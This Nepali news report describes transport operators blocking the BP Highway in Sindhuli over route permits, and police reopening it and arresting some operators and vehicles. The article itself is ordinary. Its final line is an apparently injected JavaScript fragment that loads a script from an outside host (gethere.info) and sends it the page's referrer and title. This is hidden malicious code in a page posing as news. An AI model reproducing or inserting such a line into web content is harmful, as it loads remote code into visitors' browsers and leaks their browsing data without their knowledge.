सिन्धुली, १२ असोज – यातायात व्यवसायीले बन्द गराएको बिपी राजमार्ग प्रहरीले खुलाएको छ ।

सरकारले रुट परमिट नदिएको भन्दै यातायात व्यवसायीले बुधबार बिहान साढे ९ बजेदेखि राजमार्गमा सवारी साधन तेस्र्याएर सडक अवरुद्ध गरेका थिए ।

बल प्रयोग गरेर राजमार्ग खुलाउने प्रहरीको चेतावनीसँगै व्यवसायीले अवरोध हटाएका हुन् । प्रहरीको चेतावनीसँगै व्यवसायी, चालक तथा यातायात मजदुरहरु खाना खाने बाहना बनाएर राजमार्गबाट बाहिरिएका थिए ।

राजमार्ग खुलाउन पुगेका प्रहरी उपरीक्षक उमाशंकर पञ्जियारले एम्बुलेस, प्रहरीलगायत अत्यावश्यक सवारी साधन चल्न नसक्ने गरी अवरोध गरिएपछि आफूहरु सडक खुलाउन बाध्य भएको बताए । जबर्जस्ती राजमार्ग अवरुद्ध गर्न प्रयोग गरिएका एक दर्जन सवारी साधन र केही व्यवसायीलाई पक्राउ गरिएको उनले बताए ।

बिहानैदेखि राजमार्ग अवरुद्ध हुँदा तराईका विभिन्न जिल्लाबाट सिन्धुली हुँदै राजधानी र राजधानीबाट तराईका जिल्लामा हिँडेका सवारीको लामो लाम लागेपछि प्रहरीले राजमार्ग बन्द गर्न नहुने भन्दै राजमार्ग खुलाएको हो ।

यता, बिपी यातायात सेवा समितिका अध्यक्ष आकाश श्रेष्ठले भने व्यवसायीको जायज मागप्रति सरकार गम्भीर नबनेकाले आफूहरु आन्दोलनमा उत्रनु परेको बताए । बिपी यातायात, कमलामाई यातायात, हिमाल तराई यातायात, फिकल, चकमके, मध्य तराईलगायत एक दर्जन यातायात व्यवसायीले रुट परमिटको माग गर्दै राजमार्गमा अवरोध गरेका थिए । s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;